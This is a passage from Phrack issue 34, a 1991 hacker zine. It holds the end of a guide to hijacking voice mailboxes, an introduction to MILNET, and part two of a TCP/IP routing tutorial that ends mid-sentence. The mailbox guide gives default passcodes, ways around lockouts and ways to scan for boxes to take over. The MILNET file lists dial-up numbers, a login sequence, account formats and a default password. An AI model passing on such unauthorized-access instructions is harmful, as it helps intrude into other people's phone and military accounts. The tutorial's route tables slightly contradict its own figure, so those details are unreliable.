  1482. will allow you to have two greetings (a regular and an extended absence
  1483. greeting), guest accounts, urgent or regular messages, and numerous other
  1484. features.  Aspens are easy to recognize because the female voice is very
  1485. annoying and often identifies herself as Aspen.  When you dial up an Aspen
  1486. system, sometimes you have to enter an (*) to get into the vmb system.  Once
  1487. you're in you hit (#) to login.  The system will respond with 'Mailbox number
  1488. please?'  If you enter an invalid mailbox the first time it will say 'Mailbox
  1489. xxx is invalid...' and the second time it will say 'You dialed xxx, there is
  1490. no such number...'  and after a third incorrect entry it will hang up.  If
  1491. you enter a valid box, it will say the box owner's name and 'Please enter
  1492. your passcode.'  The most common default for Aspens is either box number or
  1493. box number + (0).  You only get three attempts to enter a correct box number
  1494. and then three attempts to enter a correct passcode until it will disconnect
  1495. you.  From the main menu of an Aspen box you can enter (3) to scan for other
  1496. boxes so you won't be hung up like you would from outside the box.
  1497.  
  1498. CINDY is another popular system.  The system will start by saying 'Good
  1499. Morning/Afternoon/Evening.  Please enter the mailbox number you wish...' and
  1500. is easy to identify.  After three invalid box entries the system will say
  1501. 'Good Day/Evening!' and hang up.  To login, enter the box number and during
  1502. the greet press (0) then your passcode.  The default for ALL Cindy systems is
  1503. (0).  From the main menu you can enter (6) to scan for other boxes so you
  1504. won't be hung up.  Cindy voice mail systems also have a guest feature, like
  1505. Aspens.  You can make a guest account for someone, and give them
  1506. password, and leave them messages.  To access their guest account, they just
  1507. login as you would except they enter their guest passcode.  Cindy systems
  1508. also have a feature where you can have it call a particular number and
  1509. deliver a recorded message.  However, I have yet to get this feature to work
  1510. on any Cindy boxes that I have.
  1511.  
  1512. MESSAGE CENTER is also very popular, especially with direct dials.  To login
  1513. on a Message Center, hit the (*) key during the greet and the system will
  1514. respond with 'Hello <name>.  Please enter your passcode.'  These vmbs are
  1515. very tricky with their passcode methods.  The first trick is when you enter
  1516. an invalid passcode it will stop you one digit AFTER the maximum passcode
  1517. length.  Eg. If you enter 1-2-3-4-5 and it gives you an error message you enter
  1518.  the fifth digit, that means the system uses a four digit passcode,
  1519. which is most common on Message Centers.  The second trick is that if you enter
  1520. an invalid code the first time, no matter what you enter as the second passcode
  1521. it will give you an error message and ask again.  Then if you entered the
  1522. correct passcode the second and third time it will let you login.  Also, most
  1523. Message Centers do not have a default, instead the new boxes are 'open' and
  1524. when you hit (*) it will let you in.  After hitting (*) the first time to
  1525. login a box you can hit (*) again and it will say 'Welcome to the Message
  1526. Center.' and from there you can dial other extensions.  This last feature can
  1527. be useful for scanning outside a box.  To find a new box, just keep entering
  1528. box numbers and hitting (*) to login.  If it doesn't say something to the
  1529. effect of welcome to your new mailbox then just hit (*) again and it will
  1530. send you back to the main system so you can enter another box.  This way you
  1531. will not be disconnected.  Once you find a box, you can enter (6) 'M'ake a
  1532. message to scan for other boxes with generic names.  After hitting (6) it
  1533. will ask for a mailbox number.  You can keep entering mailbox numbers until
  1534. you find a generic one.  Then you can cancel your message and go hack it out.
  1535.  
  1536.  
  1537. Q VOICE MAIL is a rather nice system but not as common.  It identifies itself
  1538. 'Welcome to Q Voice Mail Paging' so there is no question about what system it
  1539. is.  The box numbers are usually five digits and to login you enter (0) like
  1540. a Cindy system.  From the main menu you can enter (3) to scan other boxes.
  1541.  
  1542. There are many more systems I recognize but do not know the name for them.
  1543. You will become familiar with these systems too.
  1544.  
  1545.  
  1546. CONCLUSION
  1547.  
  1548. You can use someone else's vmb system to practice the methods outlined above,
  1549. but if you want a box that will last you need to scan out a virgin system.
  1550. If you did everything above and could not get a vmb, try again on another
  1551. system.  If you follow everything correctly, I guarantee you will have more
  1552. vmbs than you know what to do with.  When you start getting a lot of them, if
  1553. you are having trouble, or just want to say hi be sure to drop me a line on
  1554. either of my internet addresses, or leave me a voice mail message.
  1555.  
  1556. NOTE:  Some information was purposely not included in this file to prevent
  1557. abuse to various systems.
  1558.  
  1559.  
  1560.                                Night Ranger
  1561.                         gbatson@clutx.clarkson.edu
  1562.  
  1563.                  1-800-666-2336  Box 602  (After Business Hours)
  1564.                  1-800-435-2008  Box 896  (After Business Hours)
  1565. _______________________________________________________________________________
  1566.  
  1567.                                 ==Phrack Inc.==
  1568.  
  1569.                 Volume Three, Issue Thirty-four, File #7 of 11
  1570.                      _____________________________________
  1571.                     |                                     |
  1572.                     |  : : : : : : : : : : : : : : : : :  |
  1573.                     |  :    Brigadier General Swipe    :  |
  1574.                     |  : : : : : : : : : : : : : : : : :  |
  1575.                     |                                     |
  1576.                     |              presents:              |
  1577.                      _____________________________________
  1578.  
  1579.                     |                                     |
  1580.                     |      An Introduction to MILNET      |
  1581.                     |                                     |
  1582.                     |_____________________________________|
  1583.  
  1584.         : :Introduction: :
  1585.  
  1586.      First of all MILNET is a system used by branches of the military for
  1587. unclassified communications.  MILNET produces that infamous TAC login xxx.  TAC
  1588. MILNET is run out of the University of Southern California.  USC is the ISI
  1589. master dial up.  I would also like to point out that the Department of Defense
  1590. tends to frown on people browsing through there system.  With that in mind,
  1591. here is a basic overview of MILNET operations.
  1592.  
  1593.         : :Logging On: :
  1594.  
  1595.     MILNET can be reached over through the "nets" or can be directly connected
  1596. to by dialing 1-800-368-2217 or 213-306-1366.  The later is the ISI master dial
  1597. up.  Most military bases connect through the 800 dial up owned by AT&T.
  1598.  
  1599. ISIE MASTER LOGON PROCEDURE
  1600. ----------------------------
  1601. 1> call 213-306-1366
  1602. 2> when the phone stops ringing you are connected
  1603. 3> enter location number (9 digits) + 1 or 0
  1604. 4> hang up and it will call you
  1605. 5> pick up the phone and hit the '*' on your phone
  1606. 6> hit a carriage return on the computer
  1607. 7> at the 'what class?' prompt hit RETURN
  1608. 8> then a 'go' prompt will appear and log on as you would the 800 number.
  1609.  
  1610. MILNET LOGIN PROCEDURE
  1611. -----------------------
  1612. > When you first connect you will see:
  1613.  
  1614. 'WELCOME TO DDN. FOR OFFICIAL USE ONLY.TAC LOGIN
  1615. CALL NIC 1-800-235-3155 FOR HELP
  1616. WRPAT TAC 113 #:36
  1617.  
  1618. > the person logging on types:
  1619.  
  1620. @o 1/103
  1621.  
  1622.  YOU ALWAYS TYPE @o then other connections are:
  1623.                           ISIA             3/103
  1624.                           ISIB          10:3/52
  1625.                           ISID          10:0/27
  1626.                           ISIE             1/103    (THE EXAMPLE)
  1627.                           ISIF             2/103
  1628.                           VAX A         10:2/27
  1629.  
  1630. > Next you will see a 'USER-ID' prompt. The first 4 characters vary but it is
  1631. is always followed by a '-' and what ever connection you choose.
  1632.  
  1633. User-Id:   (example)  CER5-ISIE or MRW1-ISIE
  1634.  
  1635. > The first three letters are the initials of the user followed by a random
  1636. number (1-9).
  1637.  
  1638. Access Code: (example) 2285UNG6A or 22L8KK5CH
  1639.  
  1640. > An access code will never contain a ( 1, 0, G, Z).
  1641.  
  1642. @ USERNAME + PASSWORD        IE USERNAME SAC.512AREFW-LGTO
  1643.  
  1644. THE USERNAME EXPLANATION:
  1645. -------------------------
  1646.      The first 3 letters in the example given above are SAC. This stands for
  1647. Strategic Air Command, a branch of the Air Force.  Following that is a "."
  1648. Then the unit number and the prime mission.  In this case 512AREFW", (512th
  1649. AIR REFUELING WING).  Then a '-' and the Individual Squadron name 'LGTO'
  1650. (LOGISTICS GROUND TRANSPORTATION OPERATIONS), a fancy name for the motor pool.
  1651.      The password will not be echoed back and should be entered after the
  1652. username.  The new user password as a default is: NEW-UZER-ACNT.
  1653.  
  1654.         : :Options: :
  1655.  
  1656. PROGRAMS AVAILABLE TO SAC USERS:
  1657. -------------------------------
  1658.  
  1659. ADUTY   aids in management of additional duty assignments.
  1660.         (International help - use the ? and <ESC> keys, HELP.)
  1661.  
  1662. ARCHIVE requests files to be stored on tape for later retrieval.
  1663.         (Type HELP ARCHIVE <RET> at TOPS-20.)
  1664.  
  1665. CHAT    Provides near real time communication between terminal users on the
  1666.           same host computer.
  1667.         (Use ? with CHAT.)
  1668.  
  1669. DAILY   Executive appointment scheduling program
  1670.  
  1671. DCOPY   Handles output on DIABLO and XEROX printers
  1672.  
  1673. EMACS   Powerful full-screen text editor
  1674. FOLLOW  Suspense follow up program
  1675.  
  1676. FTP     provides file transfer capabilities between host computers
  1677.  
  1678. FKEYS   allows user to define function key (real spiffaruni)
  1679.  
  1680. HELP    the command used by stupid generals or hackers that have never used
  1681.         milnet before
  1682.  
  1683. HERMES  E-Mail
  1684.  
  1685. NCPCALC spreadsheet program
  1686.  
  1687. PHOTO   saves transcripts of sessions
  1688.  
  1689. REMIND  sends user-created reminders
  1690.  
  1691. RIPSORT a sophisticated data sorting program
  1692.         (Described in SAC's User manual (sorry))
  1693.  
  1694. SCRIBE  a powerful text formatter for preparing documents.
  1695.         (ISI's manual, SCRIBE manual - soon on MILNET V.2)
  1696.  
  1697. SPELL   text file spelling checker.
  1698.         (HELP at TOPS-20 and <DOCUMENTATION> directory international help -?)
  1699.  
  1700. SUSCON  allows the creating, sending, and clearing of suspenses.
  1701.         (international help - ? and <ESC>, HELP command)
  1702.  
  1703. TACOPY  used for printing hard copies of files
  1704.         (international help - ?)
  1705.  
  1706. TALK    pretty much the same as chat.
  1707.  
  1708. TIPCOPY predecessor of TACOPY
  1709.  
  1710. TEACH-EMACS     (SELF EXPLANATORY: GIVES LIST OF COMMANDS)
  1711.  
  1712. TN      Tel-Net provides multi-host access on MILNET.
  1713.         (HELP at TOPS-20 and <DOCUMENTATION> directory,
  1714.          international help - use ? and <ESC>)
  1715.  
  1716. XED     line oriented text editor.
  1717.         (HELP at TOPS-20 and <DOCUMENTATION> directory)
  1718.  
  1719.         : :Logging Out: :
  1720.  
  1721. TYPE:  @L
  1722.  
  1723.         : :ID Card: :
  1724.  
  1725.      When a user gets a MILNET account he/she receives a card in the mail that
  1726. looks similar to the diagram below.  It is credit card sized and will be blue &
  1727. white.
  1728.  _______________________________________
  1729. /                                       \
  1730. | HOST USC-ISIE 26.1.0.103              |
  1731. | HOST ADMINISTRATOR GORDON,VICKI L.    |
  1732. |---------------------------------------|
  1733. | DDN CARD HOLDER:                      |
  1734. | SMITH, BILL A, 1st LT.                |
  1735. | CARD 418475                           |
  1736. |---------------------------------------|
  1737. | USER ID:CER5-ISIE                     |
  1738. | ACCESS CODE:2285ANI6A                 |
  1739. | USERNAME: SAC.512AREFW-LGTO           |
  1740. | PASSWORD: NEW-UZER-ACNT               |
  1741. \_______________________________________/
  1742. _______________________________________________________________________________
  1743.  
  1744. : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : :
  1745. _______________________________________________________________________________
  1746.  
  1747.  
  1748.                             ==Phrack Inc.==
  1749.  
  1750.                 Volume Three, Issue Thirty-Four, File #8 of 11
  1751.  
  1752.                 A TCP/IP Tutorial : Behind The Internet
  1753.                             Part Two of Two
  1754.  
  1755.                            October 4th, 1991
  1756.  
  1757.                          Presented by  The Not
  1758.  
  1759. 5.  Internet Protocol
  1760.  
  1761.    The IP module is central to internet technology and the essence of IP
  1762.    is its route table.  IP uses this in-memory table to make all
  1763.    decisions about routing an IP packet.  The content of the route table
  1764.    is defined by the network administrator.  Mistakes block
  1765.    communication.
  1766.  
  1767.    To understand how a route table is used is to understand
  1768.    internetworking.  This understanding is necessary for the successful
  1769.    administration and maintenance of an IP network.
  1770.  
  1771.    The route table is best understood by first having an overview of
  1772.    routing, then learing about IP network addresses, and then looking
  1773.    at the details.
  1774.  
  1775. 5.1  Direct Routing
  1776.  
  1777.    The figure below is of a tiny internet with 3 computers: A, B, and C.
  1778.    Each computer has the same TCP/IP protocol stack as in Figure 1.
  1779.    Each computer's Ethernet interface has its own Ethernet address.
  1780.    Each computer has an IP address assigned to the IP interface by the
  1781.    network manager, who also has assigned an IP network number to the
  1782.    Ethernet.
  1783.  
  1784.                           A      B      C
  1785.                           |      |      |
  1786.                         --o------o------o--
  1787.                         Ethernet 1
  1788.                         IP network "development"
  1789.  
  1790.                        Figure 6.  One IP Network
  1791.  
  1792.    When A sends an IP packet to B, the IP header contains A's IP address
  1793.    as the source IP address, and the Ethernet header contains A's
  1794.    Ethernet address as the source Ethernet address.  Also, the IP header
  1795.    contains B's IP address as the destination IP address and the
  1796.    Ethernet header contains B's Ethernet address as the des
  1797.                 ----------------------------------------
  1798.                 |address            source  destination|
  1799.                 ----------------------------------------
  1800.                 |IP header          A       B          |
  1801.                 |Ethernet header    A       B          |
  1802.                 ----------------------------------------
  1803.        TABLE 5.  Addresses in an Ethernet frame for an IP packet
  1804.                               from A to B
  1805.  
  1806.    For this simple case, IP is overhead because the IP adds little to
  1807.    the service offered by Ethernet.  However, IP does add cost: the
  1808.    extra CPU processing and network bandwidth to generate, transmit, and
  1809.    parse the IP header.
  1810.  
  1811.    When B's IP module receives the IP packet from A, it checks the
  1812.    destination IP address against its own, looking for a match, then it
  1813.    passes the datagram to the upper-level protocol.
  1814.  
  1815.    This communication between A and B uses direct routing.
  1816.  
  1817. 5.2  Indirect Routing
  1818.  
  1819.    The figure below is a more realistic view of an internet.  It is
  1820.    composed of 3 Ethernets and 3 IP networks connected by an IP-router
  1821.    called computer D.  Each IP network has 4 computers; each computer
  1822.    has its own IP address and Ethernet address.
  1823.  
  1824.           A      B      C      ----D----      E      F      G
  1825.           |      |      |      |   |   |      |      |      |
  1826.         --o------o------o------o-  |  -o------o------o------o--
  1827.         Ethernet 1                 |  Ethernet 2
  1828.         IP network "development"   |  IP network "accounting"
  1829.                                    |
  1830.                                    |
  1831.                                    |     H      I      J
  1832.                                    |     |      |      |
  1833.                                  --o-----o------o------o--
  1834.                                   Ethernet 3
  1835.                                   IP network "factory"
  1836.  
  1837.                Figure 7.  Three IP Networks; One internet
  1838.  
  1839.    Except for computer D, each computer has a TCP/IP protocol stack like
  1840.    that in Figure 1.  Computer D is the IP-router; it is connected to
  1841.    all 3 networks and therefore has 3 IP addresses and 3 Ethernet
  1842.    addresses.  Computer D has a TCP/IP protocol stack similar to that in
  1843.    Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers
  1844.    instead of 2.  Please note that computer D has only one IP module.
  1845.  
  1846.    The network manager has assigned a unique number, called an IP
  1847.    network number, to each of the Ethernets.  The IP network numbers are
  1848.    not shown in this diagram, just the network names.
  1849.  
  1850.    When computer A sends an IP packet to computer B, the process is
  1851.    identical to the single network example above.  Any communication
  1852.    between computers located on a single IP network matches the direct
  1853.    routing example discussed previously.
  1854.  
  1855.    When computer D and A communicate, it is direct communication.  When
  1856.    computer D and E communicate, it is direct communication.  When
  1857.    computer D and H communicate, it is direct communication.  This is
  1858.    because each of these pairs of computers is on the same IP network.
  1859.  
  1860.    However, when computer A communicates with a computer on the far side
  1861.    of the IP-router, communication is no longer direct.  A must use D to
  1862.    forward the IP packet to the next IP network.  This communication is
  1863.    called "indirect".
  1864.  
  1865.    This routing of IP packets is done by IP modules and happens
  1866.    transparently to TCP, UDP, and the network applications.
  1867.  
  1868.    If A sends an IP packet to E, the source IP address and the source
  1869.    Ethernet address are A's.  The destination IP address is E's, but
  1870.    because A's IP module sends the IP packet to D for forwarding, the
  1871.    destination Ethernet address is D's.
  1872.  
  1873.                 ----------------------------------------
  1874.                 |address            source  destination|
  1875.                 ----------------------------------------
  1876.                 |IP header          A       E          |
  1877.                 |Ethernet header    A       D          |
  1878.                 ----------------------------------------
  1879.        TABLE 6.  Addresses in an Ethernet frame for an IP packet
  1880.                          from A to E (before D)
  1881.  
  1882.    D's IP module receives the IP packet and upon examining the
  1883.    destination IP address, says "This is not my IP address," and sends
  1884.    the IP packet directly to E.
  1885.  
  1886.                 ----------------------------------------
  1887.                 |address            source  destination|
  1888.                 ----------------------------------------
  1889.                 |IP header          A       E          |
  1890.                 |Ethernet header    D       E          |
  1891.                 ----------------------------------------
  1892.        TABLE 7.  Addresses in an Ethernet frame for an IP packet
  1893.                          from A to E (after D)
  1894.  
  1895.    In summary, for direct communication, both the source IP address and
  1896.    the source Ethernet address is the sender's, and the destination IP
  1897.    address and the destination Ethernet addrss is the recipient's.  For
  1898.    indirect communication, the IP address and Ethernet addresses do not
  1899.    pair up in this way.
  1900.  
  1901.    This example internet is a very simple one.  Real networks are often
  1902.    complicated by many factors, resulting in multiple IP-routers and
  1903.    several types of physical networks.  This example internet might have
  1904.    come about because the network manager wanted to split a large
  1905.    Ethernet in order to localize Ethernet broadcast traffic.
  1906.  
  1907. 5.3  IP Module Routing Rules
  1908.  
  1909.    This overview of routing has shown what happens, but not how it
  1910.    happens.  Now let's examine the rules, or algorithm, used by the IP
  1911.    module.
  1912.  
  1913.      For an outgoing IP packet, entering IP from an upper layer, IP must
  1914.      decide whether to send the IP packet directly or indirectly, and IP
  1915.      must choose a lower network interface.  These choices are made by
  1916.      consulting the route table.
  1917.  
  1918.      For an incoming IP packet, entering IP from a lower interface, IP
  1919.      must decide whether to forward the IP packet or pass it to an upper
  1920.      layer.  If the IP packet is being forwarded, it is treated as an
  1921.      outgoing IP packet.
  1922.  
  1923.      When an incoming IP packet arrives it is never forwarded back out
  1924.      through the same network interface.
  1925.  
  1926.    These decisions are made before the IP packet is handed to the lower
  1927.    interface and before the ARP table is consulted.
  1928.  
  1929. 5.4  IP Address
  1930.  
  1931.    The network manager assigns IP addresses to computers according to
  1932.    the IP network to which the computer is attached.  One part of a 4-
  1933.    byte IP address is the IP network number, the other part is the IP
  1934.    computer number (or host number).  For the computer in table 1, with
  1935.    an IP address of 223.1.2.1, the network number is 223.1.2 and the
  1936.    host number is number 1.
  1937.  
  1938.    The portion of the address that is used for network number and for
  1939.    host number is defined by the upper bits in the 4-byte address.  All
  1940.    example IP addresses in this tutorial are of type class C, meaning
  1941.    that the upper 3 bits indicate that 21 bits are the network number
  1942.    and 8 bits are the host number.  This allows 2,097,152 class C
  1943.    networks up to 254 hosts on each network.
  1944.  
  1945.    The IP address space is administered by the NIC (Network Information
  1946.    Center).  All internets that are connected to the single world-wide
  1947.    Internet must use network numbers assigned by the NIC.  If you are
  1948.    setting up your own internet and you are not intending to connect it
  1949.    to the Internet, you should still obtain your network numbers from
  1950.    the NIC.  If you pick your own number, you run the risk of confusion
  1951.    and chaos in the eventuality that your internet is connected to
  1952.    another internet.
  1953.  
  1954. 5.5  Names
  1955.  
  1956.    People refer to computers by names, not numbers.  A computer called
  1957.    alpha might have the IP address of 223.1.2.1.  For small networks,
  1958.    this name-to-address translation data is often kept on each computer
  1959.    in the "hosts" file.  For larger networks, this translation data file
  1960.    is stored on a server and accessed across the network when needed.  A
  1961.    few lines from that file might look like this:
  1962.  
  1963.    223.1.2.1     alpha
  1964.    223.1.2.2     beta
  1965.    223.1.2.3     gamma
  1966.    223.1.2.4     delta
  1967.    223.1.3.2     epsilon
  1968.    223.1.4.2     iota
  1969.  
  1970.    The IP address is the first column and the computer name is the
  1971.    second column.
  1972.  
  1973.    In most cases, you can install identical "hosts" files on all
  1974.    computers.  You may notice that "delta" has only one entry in this
  1975.    file even though it has 3 IP addresses.  Delta can be reached with
  1976.    any of its IP addresses; it does not matter which one is used.  When
  1977.    delta receives an IP packet and looks at the destination address, it
  1978.    will recognize any of its own IP addresses.
  1979.  
  1980.    IP networks are also given names.  If you have 3 IP networks, your
  1981.    "networks" file for documenting these names might look something like
  1982.    this:
  1983.  
  1984.    223.1.2     development
  1985.    223.1.3     accounting
  1986.    223.1.4     factory
  1987.  
  1988.    The IP network number is in the first column and its name is in the
  1989.    second column.
  1990.  
  1991.    From this example you can see that alpha is computer number 1 on the
  1992.    development network, beta is computer number 2 on the development
  1993.    network and so on.  You might also say that alpha is development.1,
  1994.    Beta is development.2, and so on.
  1995.  
  1996.    The above hosts file is adequate for the users, but the network
  1997.    manager will probably replace the line for delta with:
  1998.  
  1999.    223.1.2.4     devnetrouter    delta
  2000.    223.1.3.1     facnetrouter
  2001.    223.1.4.1     accnetrouter
  2002.  
  2003.    These three new lines for the hosts file give each of delta's IP
  2004.    addresses a meaningful name.  In fact, the first IP address listed
  2005.    has 2 names; "delta" and "devnetrouter" are synonyms.  In practice
  2006.    "delta" is the general-purpose name of the computer and the other 3
  2007.    names are only used when administering the IP route table.
  2008.  
  2009.    These files are used by network administration commands and network
  2010.    applications to provide meaningful names.  They are not required for
  2011.    operation of an internet, but they do make it easier for us.
  2012.  
  2013. 5.6  IP Route Table
  2014.  
  2015.    How does IP know which lower network interface to use when sending
  2016.    out a IP packet?  IP looks it up in the route table using a search
  2017.    key of the IP network number extracted from the IP destination
  2018.    address.
  2019.  
  2020.    The route table contains one row for each route.  The primary columns
  2021.    in the route table are:  IP network number, direct/indirect flag,
  2022.    router IP address, and interface number.  This table is referred to
  2023.    by IP for each outgoing IP packet.
  2024.  
  2025.    On most computers the route table can be modified with the "route"
  2026.    command.  The content of the route table is defined by the network
  2027.    manager, because the network manager assigns the IP addresses to the
  2028.    computers.
  2029.  
  2030. 5.7  Direct Routing Details
  2031.  
  2032.    To explain how it is used, let us visit in detail the routing
  2033.    situations we have reviewed previously.
  2034.  
  2035.                         ---------        ---------
  2036.                         | alpha |         | beta  |
  2037.                         |    1  |         |  1    |
  2038.                         ---------         ---------
  2039.                              |               |
  2040.                      --------o---------------o-
  2041.                       Ethernet 1
  2042.                       IP network "development"
  2043.  
  2044.                Figure 8.  Close-up View of One IP Network
  2045.  
  2046.    The route table inside alpha looks like this:
  2047.  
  2048.      --------------------------------------------------------------
  2049.      |network      direct/indirect flag  router   interface number|
  2050.      --------------------------------------------------------------
  2051.      |development  direct                <blank>  1               |
  2052.      --------------------------------------------------------------
  2053.                   TABLE 8.  Example Simple Route Table
  2054.  
  2055.    This view can be seen on some UNIX systems with the "netstat -r"
  2056.    command.  With this simple network, all computers have identical
  2057.    routing tables.
  2058.  
  2059.    For discussion, the table is printed again without the network number
  2060.    translated to its network name.
  2061.  
  2062.      --------------------------------------------------------------
  2063.      |network      direct/indirect flag  router   interface number|
  2064.      --------------------------------------------------------------
  2065.      |223.1.2      direct                <blank>  1               |
  2066.      --------------------------------------------------------------
  2067.            TABLE 9.  Example Simple Route Table with Numbers
  2068.  
  2069. 5.8  Direct Scenario
  2070.  
  2071.    Alpha is sending an IP packet to beta.  The IP packet is in alpha's
  2072.    IP module and the destination IP address is beta or 223.1.2.2.  IP
  2073.    extracts the network portion of this IP address and scans the first
  2074.    column of the table looking for a match.  With this network a match
  2075.    is found on the first entry.
  2076.  
  2077.    The other information in this entry indicates that computers on this
  2078.    network can be reached directly through interface number 1.  An ARP
  2079.    table translation is done on beta's IP address then the Ethernet
  2080.    frame is sent directly to beta via interface number 1.
  2081.  
  2082.    If an application tries to send data to an IP address that is not on
  2083.    the development network, IP will be unable to find a match in the
  2084.    route table.  IP then discards the IP packet.  Some computers provide
  2085.    a "Network not reachable" error message.
  2086.  
  2087. 5.9  Indirect Routing Details
  2088.  
  2089.    Now, let's take a closer look at the more complicated routing
  2090.    scenario that we examined previously.
  2091.  
  2092.           ---------           ---------           ---------
  2093.           | alpha |           | delta |           |epsilon|
  2094.           |    1  |           |1  2  3|           |   1   |
  2095.           ---------           ---------           ---------
  2096.                |               |  |  |                |
  2097.        --------o---------------o- | -o----------------o--------
  2098.         Ethernet 1                |     Ethernet 2
  2099.         IP network "Development"  |     IP network "accounting"
  2100.                                   |
  2101.                                   |     --------
  2102.                                   |     | iota |
  2103.                                   |     |  1   |
  2104.                                   |     --------
  2105.                                   |        |
  2106.                                 --o--------o--------
  2107.                                     Ethernet 3
  2108.                                     IP network "factory"
  2109.  
  2110.              Figure 9.  Close-up View of Three IP Networks
  2111.  
  2112.    The route table inside alpha looks like this:
  2113.  
  2114.  ---------------------------------------------------------------------
  2115.  |network      direct/indirect flag  router          interface number|
  2116.  ---------------------------------------------------------------------
  2117.  |development  direct                <blank>         1               |
  2118.  |accounting   indirect              devnetrouter    1               |
  2119.  |factory      indirect              devnetrouter    1               |
  2120.  --------------------------------------------------------------------
  2121.                       TABLE 10.  Alpha Route Table
  2122.  
  2123.    For discussion the table is printed again using numbers instead of
  2124.    names.
  2125.  
  2126.   --------------------------------------------------------------------
  2127.   |network      direct/indirect flag  router         interface number|
  2128.   --------------------------------------------------------------------
  2129.   |223.1.2      direct                <blank>        1               |
  2130.   |223.1.3      indirect              223.1.2.4      1               |
  2131.   |223.1.4      indirect              223.1.2.4      1               |
  2132.   --------------------------------------------------------------------
  2133.                TABLE 11.  Alpha Route Table with Numbers
  2134.  
  2135.    The router in Alpha's route table is the IP address of delta's
  2136.    connection to the development network.
  2137.  
  2138. 5.10  Indirect Scenario
  2139.  
  2140.    Alpha is sending an IP packet to epsilon.  The IP packet is in
  2141.    alpha's IP module and the destination IP address is epsilon
  2142.    (223.1.3.2).  IP extracts th network portion of this IP address
  2143.    (223.1.3) and scans the first column of the table looking for a
  2144.    match.  A match is found on the second entry.
  2145.  
  2146.    This entry indicates that computers on the 223.1.3 network can be
  2147.    reached through the IP-router devnetrouter.  Alpha's IP module then
  2148.    does an ARP table translation for devnetrouter's IP address and sends
  2149.    the IP packet directly to devnetrouter through Alpha's interface
  2150.    number 1.  The IP packet still contains the destination address of
  2151.    epsilon.
  2152.  
  2153.    The IP packet arrives at delta's development network interface and is
  2154.    passed up to delta's IP module.  The destination IP address is
  2155.    examined and because it does not match any of delta's own IP
  2156.    addresses, delta decides to forward the IP packet.
  2157.  
  2158.    Delta's IP module extracts the network portion of the destination IP
  2159.    address (223.1.3) and scans its route table for a matching network
  2160.    field.  Delta's route table looks like this:
  2161.  
  2162.  ----------------------------------------------------------------------
  2163.  |network      direct/indirect flag  router           interface number|
  2164.  ----------------------------------------------------------------------
  2165.  |development  direct                <blank>          1               |
  2166.  |factory      direct                <blank>          3               |
  2167.  |accounting   direct                <blank>          2               |
  2168.  ----------------------------------------------------------------------
  2169.                      TABLE 12.  Delta's Route Table
  2170.  
  2171.    Below is delta's table printed again, without the translation to
  2172.    names.
  2173.  
  2174.  ----------------------------------------------------------------------
  2175.  |network      direct/indirect flag  router           interface number|
  2176.  ----------------------------------------------------------------------
  2177.  |223.1.2      direct                <blank>          1               |
  2178.  |223.1.3      direct                <blank>          3               |
  2179.  |223.1.4      direct                <blank>          2               |
  2180.  ----------------------------------------------------------------------
  2181.               TABLE 13.  Delta's Route Table with Numbers
  2182.  
  2183.    The match is found on the second entry.  IP then sends the IP packet
  2184.    directly to epsilon through interface number 3.  The IP packet
  2185.    contains the IP destination address of epsilon and the Ethernet
  2186.    destination address of epsilon.
  2187.  
  2188.    The IP packet arrives at epsilon and is passed up to epsilon's IP
  2189.    module.  The destination IP address is examined and found to match
  2190.    with epsilon's IP address, so the IP packet is passed to the upper
  2191.    protocol layer.
  2192.  
  2193. 5.11  Routing Summary
  2194.  
  2195.    When a IP packet travels through a large internet it may go through
  2196.    many IP-routers before it reaches its destination.  The path it takes
  2197.    is not determined by a central source but is a result of consulting
  2198.    each of the routing tables used in the journey.  Each computer
  2199.    defines only the next hop in the journey and relies on that computer
  2200.    to send the IP packet on its way.
  2201.  
  2202. 5.12  Managing the Routes
  2203.  
  2204.    Maintaining correct routing tables on all computers in a large
  2205.    internet is a difficult task; network configuration is being modified
  2206.    constantly by the network managers to meet changing needs.  Mistakes
  2207.    in routing tables can block communication in ways that are
  2208.    excruciatingly tedious to diagnose.
  2209.  
  2210.    Keeping a simple network configuration goes a long way towards making
  2211.    a reliable internet.  For instance, the most straightforward method
  2212.    of assigning IP networks to Ethernet is to assign a single IP network
  2213.    number to each Ethernet.
  2214.  
  2215.    Help is also available from certain protocols and network
  2216.    applications.  ICMP (Internet Control Message Protocol) can report
  2217.    some routing problems.  For small networks the route table is filled
  2218.    manually on each computer by the network administrator.  For larger
  2219.    networks the network administrator automates this manual operation
  2220.    with a routing protocol to distribute routes throughout a network.
  2221.  
  2222.    When a computer is moved from one IP network to another, its IP
  2223.    address must change.  When a computer is removed from an IP network
  2224.    its old address becomes invalid.  These changes require frequent
  2225.    updates to the "hosts" file.  This flat file can become difficult to
  2226.    maintain for even medium-size networks.  The Domain Name System helps
  2227.    solve these problems.
  2228.  
  2229. 6.  User Datagram Protocol
  2230.  
  2231.    UDP is one of the two main protocols to reside on top of IP.  It
  2232.    offers service to the user's network applications.  Example network
  2233.    applications that use UDP are:  Network File System (NFS) and Simple
  2234.    Network Management Protocol (SNMP).  The service is little more than
  2235.    an interface to IP.
  2236.  
  2237.    UDP is a connectionless datagram delivery service that does not
  2238.    guarantee delivery.  UDP does not maintain an end-to-end connection
  2239.    with the remote UDP module; it merely pushes the datagram out on the
  2240.    net and accepts incoming datagrams off the net.
  2241.  
  2242.    UDP adds two values to what is provided by IP.  One is the
  2243.    multiplexing of information between applications based on port
  2244.    number.  The other is a checksum to check the integrity of the data.
  2245.  
  2246. 6.1  Ports
  2247.  
  2248.    How does a client on one computer reach the server on another?
  2249.  
  2250.    The path of communication between an application and UDP is through
  2251.    UDP ports.  These ports are numbered, beginning with zero.  An
  2252.    application that is offering service (the server) waits for messages
  2253.    to come in on a specific port dedicated to that service.  The server
  2254.    waits patiently for any client to request service.
  2255.  
  2256.    For instance, the SNMP server, called an SNMP agent, always waits on
  2257.    port 161.  There can be only one SNMP agent per computer because
  2258.    there is only one UDP port number 161.  This port number is well
  2259.    known; it is a fixed number, an internet assigned number.  If an SNMP
  2260.    client wants service, it sends its request to port number 161 of UDP
  2261.    on the destination computer.
  2262.  
  2263.    When an application sends data out through UDP it arrives at the far
  2264.    end as a single unit.  For example, if an application does 5 writes
  2265.    to the UDP port, the application at the far end will do 5 reads from
  2266.    the UDP port.  Also, the size of each write matches the size of each
  2267.    read.
  2268.  
  2269.    UDP preserves the message boundary defined by the application.  It
  2270.    never joins two application messages together, or divides a single
  2271.    application message into parts.
  2272.  
  2273. 6.2  Checksum
  2274.  
  2275.    An incoming IP packet with an IP header type field indicating "UDP"
  2276.    is passed up to the UDP module by IP.  When the UDP module receives
